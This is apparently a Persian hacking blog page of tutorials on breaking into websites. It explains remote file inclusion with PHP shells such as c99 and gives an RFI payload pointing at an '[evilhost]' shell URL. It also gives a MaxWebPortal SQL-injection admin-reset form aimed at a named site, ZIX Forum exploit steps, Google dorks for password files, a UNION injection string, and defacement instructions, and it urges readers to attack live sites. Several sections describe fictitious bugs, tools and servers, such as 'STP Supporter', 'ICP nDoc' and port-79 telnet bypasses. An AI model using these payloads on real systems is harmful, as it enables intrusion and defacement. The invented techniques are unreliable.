چون اونقدر حجم مطالبم زیاد بود که تو صفحه اصلی جا نشد

نظر هم بدید به مطالب

وبلاگ من تنها وبلاگ مرجع برای یاد گیری و هک هر نوع سایت و سرور است

خالی بندی

Remote FIle Inclusion طیف وسیعی از اسیب پذیری ها رو شامل می شه

یه صفحه ی web به چند طریق متغیر می گیره

1. get

2 . post

تو یک صفحه web چه asp یا چه php ممکنه یک یا چند صفحه ی دیگه include بشه و دیگه از تکرار جلوگیری بشه

مثلآ من header.php رو تو همه ی صفحه ها منهای چند صفحه احتیاج دارم

میام تو صفحه های که احتیاج دارم اون رو include می کنم

PHP Code:

include("header.php");

بعضی وقتا هم بجای header.php از یه متغیر استفاده می کنم

حالا اگه متد get به طور مثال باز باشه منم به جای اون متغیر از یه ادرس وب که تو اون یه فایل text یا php محتوی یه سری کد داشته باشم اون کد ها داخل اون صفحه قرار می گیره و include می شه

حالا اون فایل php اگه یه shell باشه من به فایل ها و فولدرای اون سایت که همچین صفحه ای داره دسترسی دارم و می تونم هکش کنم

php shell ها فایل هایی هستن که با اون ها میتونید کارای خاصی رو روی یه سرور انجام بدید و اگه روی اون Server یا site از اون سرور upload بشه دسترسی های خاصی رو بهتون می ده

داونلود برای همه ی فایل ها و اپلود برای فایل های دارای سطح دسترسی write برای عموم

اتصال به بانک اطلاعاتی همچون phpmyadmin

اجرای command مثل ssh در لیوکس و یا command prompt در windows

حالا این php shell یا کد های محتوی اون به روش های مختلفی می تونه رو ی قربانی اجرا و یا upload بشه

مثلآ remote file upload و یا remote file include این نمونه باگ ها رو تو بخش last news تالار میذاریم

فایلی هم که باید upload بشه یا include بشه اینجا می ذارم داونلود کنید

دانلود

با اين exploit مي تونيد يه user ادمين تو max portal اضافه كنيد

كد زير رو تو يه فايل html ذخيره كنيد

<"form action="http://www.bid-web.com/maxwebportal/password.asp?mode=reset" method="post>

pass1: <input name="pass" type="text" value="123456" size="150">

pass2: <input name="pass2" type="text" value="123456" size="150">

Id: <input name="memId" type="text" value="-1" size="150">

size="150">

<"input name="Submit" type="submit" value="Submit>

</form>

اين exploit واسه maxwebportal 1.36 بوده و سايت بالا هم همين ورژنه

<form action="http://[URL]/password.asp?mode=reset" method="post">

pass1: <input name="pass" type="text" value="123456" size="150">

pass2: <input name="pass2" type="text" value="123456" size="150">

Id: <input name="memId" type="text" value="-1" size="150">

Member Key: <input name="memKey" type="text" value="foo' or M_Name='admin" size="150">

<"input name="Submit" type="submit" value="Submit>

</form>

سايت ها ي ديگه هم كه max portal روشونه رو تو گوگل مي تونيد پيدا كنيد و به جاي http://www.bid-web.com/maxwebportal/ در كد بالا قرار بديد

این یه اکسپلویت local هست

با این اکسپلویت بعد از connect شدن میتونی process ها رو ببندید

exm:nima.exe explorer.exe

این یک Exploit جدید که هنوزم روی سایت ها کار می کنه

اول یکی از 4 عبارت نوشته را در گوگل سرچ کنید .. و بعد از سرچ شدن گوگل سایت هایی را پیدا میکنه که می تونید آنهارو هک کنید. بهتر هست که از صفحه های 3 یا 4 گوگل شروع کنید چون سایت های صفحه ی اول بیشترشون یا همون اول هک شدن یا path شدن

خوب حالا با فرض این سایت پیدا شد حالا چی کار کنیم . . .فرض اسم سایتمون www.site.com است

باید یکی از دو عبارت exploration را به جلوی اسم سایت یعنی www.site.com اضافه کنید اگه سایت آسیب پذیر بود که خوشبحالتون ولی اگه آسیب پذیر نبود که نمی تونید وارد بشید. . . .

و مورده دیگری که باید بگم اینه که به جای http://[evilhost] باید آدرس های PHPSHELL خودتون رو قرار بدین مثل C99 و r57 و . . که این فایل ها با پسوند PHP یا TXT وبا حتی Gif می توانید در Host های خود upload کرده مثل Persiangig آپلود کرده و به جای اون آدرس قرار دهید

exploration:

[dir]/index.php?config=1&base_datapath=http://[evilhost]/

دانلود

سرور چيزي نيست جز يک کامپيوتر که تعدادي فايل و دايرکتوري روي ان ذخيره شده . سيستم عامل اين کامپيوتر به گونه ايست که علاوه بر دسترسي مستقيم به ان ( تا اينجا مثل هر کامپيوتري) اجازه ميدهد که افراد از کامپيوتر هاي ديگري که از طريق يک شبکه بدان کامپيوتر متصل اند به ان فايل ها دسترسي داشته باشند. اما براي دسترسي به اين فايل ها مقرراتي وجود دارد که همان admin معروف که سرپرستي اين شبکه را بر عهده دارد وضع ميکند. او دسترسي به بعضي فايل ها را محدود و به بعضي ديگر را مجاز ميسازد. يا براي دسترسي به فايل ها پس ورد هايي کي گذارد که تنها افراد خاصي بدان ها دسترسي داشته باشند.

پس تا اينجا واضح شد که هر کس براي دسترسي به اين فايل ها بايد حداقل با سيستم عامل ان سرور خاص اشنا باشد. و بعد نيز با شيوه دسترسي به اين فايل ها از راه دور (ftp).

حالا فرض کنيد که ان سيستم عامل يونيکس است و شما قصد داريد فايل اچ تي ام ال حاوي اطلاعات مربوط به صفحه اول سايتي دست يافته به جاي ان صفحهاي قرار دهيد که حاوي اسم شريفتان با ادرس ايميلتان است ( مثلا : "اين سايت توسط من "علی سلیمی" هک شد. اي ميل:XXXX@xxx.XXX") براي اين کار شما تلاش خواهيد کرد که مثل کامپيوتر خانه يتان وارد دايرکتوري مربوطه شده فايل x را انگولک کنيد.

داشتن برنامهاي مثل Cracker Jack و يا مشابه مه بعدا مي گوييم چه کار مي کند.

/etc است قرار دارند. پس فايل ما ادرسش مي شود : /etc/passwd . اگر فکر مي کنيد که با دسترسي به اين فايل همه پس وردها از انه شماست و کار انجام شده ، در اشتباهيد. زيرا تمام اطلاعاته موجود در اين فايل به صورتي يک طرفه "کد" شده اند و عملا "decode " کردن ان ممکن نيست. پس چه بايد کرد:

ان برنامه اي که ان بالا اسمش را بردم (Cracker Jack) برنامه ايست که ان فايل کد شده را برداشته و سعي مي کند با تطبيق دادن ان با کلماتي از پيش معين . پس ورد هاي موجود در ان فايل را پيدا کند .(مثل کاري که يک باستان شناس براي خواندن خط باستاني مي کند).

نکته اينجاست که ان ادمين کذايي قرار نيست که پس ورد ها را دودستي به شما تقديم کند. براي دسترسي به ان فايل پس ورد ها بايد از ftp استفاده کنيد

نکته : برای تایپ سمبل © در قسمت Run ویندوز charmap را تایپ کنید و در اون صفحه روی این سمبل دو بار کلیک کنید و سپس دکمه کپی را بزنید

ابتدا اینو تو گوگل سرچ کنید ZIX Forum 1.12©

برای راحتی از صفحات 4 یا 5 به بعد رو امتحان کنید

قبلش هم به این ادرس برید برای دریافت Exploit حمله www.milw0rm.com/exploit/2306

تو این سایت به سطری که نوشته User name یرید و از قسمت Replynew.asp ...... به بعد رو کپی کنید

حالا اگر سایتی رو پیدا کردید در ادرس بارتون عبارت default.asp رو پاک کنید و به جاش اون Exploit رو کپی کنید و اینتر کنید

نکته : تو اون سایت Exploit میتونید با سطری که اولش نوشته password هم همین کار رو کنید ( اینم مثل سطر User name از قسمت Replynew.asp ...... به بعد رو کپی کنید و روی سایت بزنید )

پس چی شد ما یه بار کد username و یه بار هم کد password رو زدیم در ادامه ادرس سایت

حالا تو همون سایت Exploit قسمت اخر که نوشته Admin panel از قسمت theadmin/.... به بعد رو کپی کنید و روی سایت مثل همون User name بزنید که باید وارد قسمت login بشید حالا شما میتونید بدون وارد کردن username , password وارد مدیریت سایت بشید

حالا اون بالاهای سایت دنبال دکمه تنظیمات (Setting) رو بزنید

بعد روی متن New layout کلیک کنید

حالا تو جعبع متن های مربوطه مشخصات خودتون رو بنویسید و پست کنید و این بار به جای Defult.asp که پاک کرده بودید بنویسید main.asp و اینتر کنید و بس. تمام شد

متد filetype

با استفاده از این متد می توانید به گوگل بگویید که در اینترنت به دنبال فایل هایی با پسوند تعیین شده (مانند jpg,txt,mdb) بگردد.

برای مثال می توانید این عبارت را در گوگل جست و جو کنید: filetype:txt

و سپس گوگل لیستی از فایل های txt را در اختیار شما قرار می دهد.

با استفاده از متدی دیگر شما این توانایی را دارید که به گوگل بگویید فایل هایی با پسوند مورد نظر را فقط در سایت هایی با دومین های خاص(مانند com,org,ir,gov) جست و جو کند: filetype:pdf site:com

و به این ترتیب، گوگل جست و جو را محدود به سایت هایی که دارای دومین com هستند می کند. (مانند : www.target.com)

متد cache

برای نمونه می توانید عبارت رو به رو را در گوگل سرچ کنید: cache:www.microsoft.com

متد intext

برای نمونه می توانید عبارت رو به رو را در گوگل سرچ کنید: intext:confidential

که در واقع گوگل تنها لینک صفحه های وبی را که دارای کلید واژه ی confidential هستند برمی گرداند.

متد inurl

برای نمونه: inurl:admin صفحاتی مانند http://target.com/admin/page.php که واژه ی admin در آدرس آن ها قرار دارد را در اختیار شما قرار می دهد.

این متد را می توان به همراه متد filetype که در ابتدا توضیح داده شد نیز به کار برد. inurl:passwd filetype:txt

شما همچنین می توانید از متد allinurl نیز استفاده کنید. تفاوت این دو متد با این مثال روشن می شود: allinurl:admin/databases

متد link

برای مثال link:www.irchatan.com لیستی از سایت هایی که به سایت ایرچتان لینک داده اند را به شما نشان می دهد.

متد related

برای مثال با سرچ کردن عبارت related:www.thenetworkadministrator.com در گوگل، لیستی از صفحاتی که به home page سایت ذکر شده شباهت دارند در اختیار شما قرار می گیرد.

intitle: examples:

inurl: examples:

inurl:"wwwroot/*."

inurl:gov filetype:xls "restricted"

"Google Search : "© Sabdrimer CMS

Exploit :

که در کد بالا به جای [evil_script] باید کد پایینیشو رو قرار بدید که کد Exploit کامل میشه :

حالا مثلا شما یه سایت رو پیدا کردید که اخر ادرسش به صورت http://www.website.com/Index.php است شما باید index.php رو پاک کنید و کد بالا رو به جاش کپی کنید

البته موقع کپی حواستون باشه قسمت http://www.website.com رو همراه کد کپی نکنید

و بعد از این کار حالا اینتر کنید و فایل c99.txt که قبلا یه جا آپلود کردیم (که من برای راحتی شما قبلا آپلود کردم) تو سایتمون Inclusion میکنیم

بعد از وارد شدن به قسمت مدیریت اون وارد شاخه Public html بشید مثل تصویر و بعد اون پاییش وارد این دایرکتوری بشید و بعد اون پایین اون صفحه *.html که خودتون از قبل ساختید رو از تو هارد تون انتخاب و اپلود کنید و جایگزین صفحه سایت اصلی کنید

در اين مقاله شما با PHP Shellers آشنايی کامل پيدا خواهيد کرد .

PHP Shell ها با يک سری کدهای PHP نوشته شده اند و به هکر اين اجازه رو ميدن که در صورت آسيب پذير بودن server به ديگر سايتها و ديگر فايلها و پوشه های server دسترسی داشته باشه و بتونه فايل آپلود کنه يا فايلی رو بخونه يا پاک کنه يا توش چيزی بنويسه و Save کنه البته اين به پرميژنی که فايل يا پوشه داراست بستگی داره که بعدا با پرميژن آشنا ميشيم .

perm :

Read - Write - Execute داره يعنی اگه Folder باشه ميتونيم توی اون Folder فايل کپی کنيم يا بخونيم و ياDelete کنيم .

اگر فايلی پرمی باشه که بشه توش Write کرد به اصطلاح بهش ميگن اين فايل Perm هستش !

چيزها يی که درباره Perm ها بايد بدانيم :

Perm هايی که با حرف d شروع ميشه يعنی اينکه پوشه هستند ( Folder ) که حرف d معرف Directory هستش مانند : drwxrwxrwx که اين پرم يک پرم 777 هستش . شما در اين Folder ها ميتوانيد فايل آپلود کنيد .

Perm هايی که با خط تيره ( - ) شروع ميشوند نشون ميدان که فايل هست نه Folder !

برای مثال : -rw-rw-rw- که شما با Edit کردن فايل ميتونيد توش هر کدی رو يا نوشته اي رو save کنيد .

حرف r به معنی Read و حرف W به معنی Write هستش .

اگر از شل c99 استفاده ميکنيد . کار شما راحتر هستش چرا که فايلها و دايرکتوری هايی که پرم هستن در C99 به رنگ سبز در قسمت مربوط به پرمها مشخص هستند و آنهايی که سفيد يا قزمز هستند به معنی پرم نبودن آنها هست .

پس يادتون باشه اگر دسترسی بالا نداريد ( Root ) پس فقط در دايرکتوری و فايلهايی که پرم هستند ميتوانيد فايل کپی کنيد يا آپلود کنيد . و يا در فايلها بنويسيد .

نکاتی در باره C99 :

بعد اينکه C99 رو جايی آپلود کرديم بايد به نکاتی توجه کنيم :

به بالای C99 دقت کنيد .

برای استفاده از این باگ ها باید برنامه STP Supporter رو روی سیستمتون نصب کنید چون این باگ تحت سیستم عامل های STP ( مانند یکی از باگ های قبلی ) کار میکنه و برای این که سیستمتون بتونه ساپورت کنه باید این برنامه رو روی سیستمتون نصب کنید

www.VICTIM.com/stpOSsupport.htm

www.VICTIM.COM/stpsystemsupportSCAN.htm

www.VICTIM.com/StpSystemScanner.php

شما میتونین با این باگ سایت هایی رو که از سرور ECHOP استفاده میکنند رو هک کنید یا در واقع وارد بخش مدیریت بشین

ابتدا باید یک سایت رو که از این سرور استفاده میکنه پیدا کنید ( من پیشنهاد میکنم که در گوگل یا یاهو عبارت Powerd By ECHOP server رو تایپ کنید ) بعد از این که یکی از این سایت ها رو پیدا کردید صفحه لاگین رو پیدا کنید ( عبارت سرچش می شه : echopserver .login ) بعد از این که پیدا کردین به جای یوزر عبارت x%'s رو تایپ کنید و به جای پسورد Xc'slg رو تایپ کنید و سپس لاگین کنید . اگر لاگین نشد دکمه Shift رو نگه دارین و عبارات بالا رو به جای یوزر و پس تایپ کنید و این دفعه مطمئن باشید که باگین میشه . اینو بگم که بعضی از این سایت ها پسوند org. دارند . مثلا من یک نمونه رو خودم زدم که آدرس این هستش : www.Mark.Org

امروز میتونید به سیستم هایی که از nDoc مدل ICP استفاده میکنند نفوذ کنید و سیستم رو بدست بگیرید.

این سیستم ها برای Range های 22.34 طراحی شده اند و آسیب پذیری این سیستم ها بسیار زیاد هستش و راحت می شه این سیستم ها رو هک کرد . ساپورت کننده این سیستم ها سرور های Tuv و بعضی وقت ها Cert هستن . همون طور که می دونید آسیب پذیری سرور های tuv تقریبا بین 22 تا 24 هستند اما آسیب پذیری سرور های cert براحتی به اندازه 22.34 میرسند و راحت میشه هکشون کرد .

آموزش هک سیستم های ICP سرور ** Cert ** :

برای این که براحتی بتونین از سرور های این سیستم بگذرین ابتدا از سرور آسیب پذیر شروع میکنم ( CERT Server ) . برای گذشتن از این سرور آسیب پذیر باید یک پرت باز آسیب پذیر که روی tag های سیستم باز هستش رو پیدا کنید . ( معمولا همیشه روی این سرور پرت ۷۹ باز هستش ) پس ما هم در این جا از پرت 79 استفاده میکنیم . برای رد شدن از سرور ابتدا کامند پرت ویندوز رو باز میکنید و فرمان Telnet www.VICTIM.com/79 این فرمان برای رد شدن از سرور های وب سایت های آسیب پذیر هستش اما فرمانی که برای نفوذ به قسمت آسیب پذیر سرور کامپیوتر ها هستش این هستش : Telnet /79 . این روش برای رد شدن از سرور های CERT هستش.بعد

وارد CMD شوید و فرمان : Share www.ICPsystem.com حالا اینتر رو بزنید و بعد باز هم فرمان : NET shareICPsystem.com/ng/VICTIMip/PORT رو بنویسید فقط همون طور که میدونید تو قسمت Ip باید آیپی سیستم قربانیتون و در قسمت PORT باید یک پرت باز روی این سرور رو بنویسید . ( 79 باز هست ) . حالا اگر مراحل رو درست رفته باشید باید به قسمت آسیب پذیر سرور سیستم قربانی وصل بشین و شل بگیرین . و حالا باید دستورات بعد از شل رو بلد باشید میتونید تمام سیستم رو زیر دست بگیرید .

یک سری از باگ های stp رو میذارم . دوباره باید برنامه STP SUPORTER رو نصب کنید تا بتونید استفاده کنید . ولی با این باگ راحت سیستم های لینوکس را زیر هک کنید.

www.Victim.com/verdanaBUGstp.php

برای کمپایل کردن این کد باید از فرمان Compile {Code} PHP استفاده کنید

با استفاده از باگ میتونید سایت های linux رو به راحتی هک کنید

برای این کار ابتدا یک سایت که از سرور fttp استفاده میکنه رو پیدا کنید و بعدش باید صفحه لاگین رو پیدا کنید . من پیشنهاد میکنم برای پیدا کردن آسون تر صفحه لاگین مثلا اگه اسم سایت عبارت زیر بود : fttp:/arian(c).com/home.php این جوری عمل میکنم و صفحه لاگین معمولا مانند عبارت زیر هستش ( البته در این نوع سایت ها ) : fttp://arian(c).com/login.php . حالا راحت به جای passwrod عبارت : pingSQLF'T'TP و به جای username عبارت a''d'mi'n این کار باعث میشه سرور ها تمامیشون هنگ کنن و شما به عنوان مدیر وارد بخش مدیریت وب سایت بشید . حالا هر کاری دوست داشتین با اون سایت انجام بدین .

ساده ترین روش هک کردن سایت ها روش های تازه و جدید هک کردن سایت های PHP هستند . برای هک کردن این نوع سایت ها بسیار روش و باگ منتشر شده است اما بیشتر اون ها رو مدیران پوچ میکنند یا اصلا باگ قلابی هستش . من امروز بهتون چند تا باگ خیلی خوب معرفی میکنم که بتونین تقریبا این نوع سایت ها رو هک کنید . فقط سریع یعنی همین الان هک کنید تا پوچ نشده این باگ ها رو از وب سایت تیم امنیتی McGraWHill گرفتم و مطمئن باشید که کار میکنه .

باگ اول : با استفاده از این باگ میتونید Title سایت رو عوض کنید و هر چی دلتون میخواد بذارین . یعنی این که باگ زیر تاتل رو Hacker By Iranain Hacker تغییر میده .

http://sitaname/ad++xhome/title:=HackeD By Iranian Hackers

باگ دوم : این باگ یک حفره خیلی جالب هستش که شما با این حفره و در واقع با این باگ میتونید یک فایل TXT به سایت اضافه کنید و مثلا توش بنویسید که hacked by iranian hackers و بعد فایل رو روی سایت آپلود کنید . الان باگ زیر همین نوشته بالا رو با پسوند txt به سایت قربانی اضافه میکنه .

http://sitaname/ad++xhome/filename:=hacked/txt:=hacked by iranian hackers

من به شما یک روش آسان رو یاد میدم . برای هک کردن سایت های آپاچی ابتدا میبایست چک کنید که آیا روی هاست سایت آنتی ویروسی نصب شده است یا نه ؟ خب برای این کار باید از یک برنامه Appache Scanner استفاده کنید .که من لینک دانلود این برنامه رو براتون آپلود کردم . بعد از این که سایت رو اسکن کردید باید ببینید که در عبارات عبارت s'p23 هستش یا خیر .

دانلود

در مرحله اول شما باید سایت هایی رو که لینوکس ساپورت میکنه و دارای حفره cmd هستش رو پیدا کنید تا بعدش با استفاده از باگ های منتشر شده از طریق این حفره به وب سایت نفوذ کنید . خب من توصیه میکنم در گوگل عبارت : cmd.php رو سرچ کنید . اگر هم حوصله سرچ ندارین من براتون لینک سرچ رو میذارم .

برای مثال شما سایتی دارای این حفره با نام : www.victim.com/cmd.php

این باگ برای این کار هستش که شما Operaing System قربانی خودتون رو مشاهده کنید :

در این مقاله شما عزیزان با نحوه هک کردن سایت هایی که آخرشان login.asp دارند آشنا میشوید .

دانلود مقاله

اول باید وب سایت های php. رو پیدا کنید . خب حالا بیاین و جلوی عبارت سایت عبارت زیر رو اضافه کنید .

www.myhack.tk/index.php/username='/*&password=*/%20AND%201=0%20UNION%20SELECT%20999/*

یعنی باید عبارت : username='/*&password=*/%20AND%201=0%20UNION%20SELECT%20999/*

حالا میتونید به جای Admin سایت به سرور نفوذ کنید

Go To Administrator Panle

برای پیدا کردن وب گروپ ها توی گوگل عبارت : Powerd By : WebGroups یا Webgroups Sign Up و یا : Webgroups را سرچ کنید.

کد هایی که باید جای Vauvle ( ویول ) جاگذاری کنید رو تو لینک زیر مشاهده کنید :

اون برنامه شما بهش اسم سایت رو میدادین و میامد براتون یک User و Pass ادمین ایجاد میکردش و شما با اون Login میکردید . اما برنامه امروز فرق میکنه . این برنامه میاد وقتی شما بهش آدرس سایت رو میدید وارد " Panl " ادمین وب سایت میشه و یوزر و پسورد رو کش میره و برای ما در خود برنامه به نمایش میگذاره

حالا اول بگم که روی چه سایت های Support میشه . این برنامه روی سایت هایی ساپورت میشه که از فرون Zix استفاده میکنند . البته باگ یکم قدیمی هست اما خیلی از سایت ها هستند که هنوز این باگ رو Patch نکردند .

امروز هم با یک آموزش نسباتا جالب در موضوع آموزش هک سایت در خدمت شما هستیم . امروز شما یاد میگیرن که چجوری به راحتی بیاین و یک سایت که از PHP-MOUDLE استفاده میکنه رو هک کنید .

کسپلیوت شماره 1 تایتل هوم پیج رو عوض میکنه . اون اکسپلیوتی که روی دیفالت من توی تکست قرار تایتل رو به Hacked By Arian-Hacker تغییر میده . شما باید عوضش کنید .

اکسپلیوت شماره 2 برای شما یک یوزر ادمین با پسوردی که خودتون میخواین اسجاد میکنه . این اکسپلیوت روی دیفالت یوزر ArianHacker و پسورد ARIANHACKER را ایجاد میکنه .

اکسپلیوت شماره 3 فایل دیتابیس وب سایت رو که دارای تمام مشخصات هست و دانلود میکنه که شما باید اون رو با ماکروسافت ACCEC باز کنید . بینید .

روش استفاده از این اکسپلیوت ها به این صورت میباشد که شما باید این Exploit ها رو جلوی Home page وب سایت اصلی قرار بدید .

Scan کردن Web Site

پیدا کردن و یا نوشتن Exploit و یا یافتن راه نفوذ

راحت بگم که این مرحله حساس ترین مرحله هک سایت هستش . برای این که شما توی مرحله اول میاین و یک حفره توی سایت پیدا میکنید . حالا نیاز به یک روش نفوذ دارید که بتونین به سایت نفوذ کنید . بهترین روش نفوذ به این طور سایت ها Expolit ها هستند . هر Expolit برای یک حفره طراحی میشود . حالا اگر حفره سایت قربانی شما نیاز به Expolit داشته باشد یا باید آن را دانلود کنید و یا باید خودتان با .net# بنویسید . خب حالا به فرض که امنیت سایت این قدر پایین بود که اصلا نیاز به اکسپلیوت نداشت .

خب حالا باید یک جوری به دیتابیس ( به فایلی که همیشه در پشت وب سایت آپلود شده و حاوی تمام مشخصات و همچنین یوزر و پسورد ادمین وب میباشد میگویند ) سایت دسترسی پیدا کنید که مثلا اگر یادتون باشه یک روش برای هک سایت های نیوز بود که با عبارت new.mdbمیشد دیتابیس رو دانلود کرد و سایت رو هک کرد.

به طور کلی مفهوم اصطلاح Deface ( دیفیس ) جا گذاری صفحه مورد نظر به جای هوم پیج سایت هستش که مثلا وقتی میرید میبینید یک صفحه نشون میده نوشته Hacked By Folan Hacker اون فلان هکر سایت رو دیفیس کرده و صفحه دیفیس خودش رو جای هوم پیج قرار داده . مثلا برای هک وبلاگ هم شما نیاز به ک صفحه دیفیس دارید که باید HTML بلد باشید .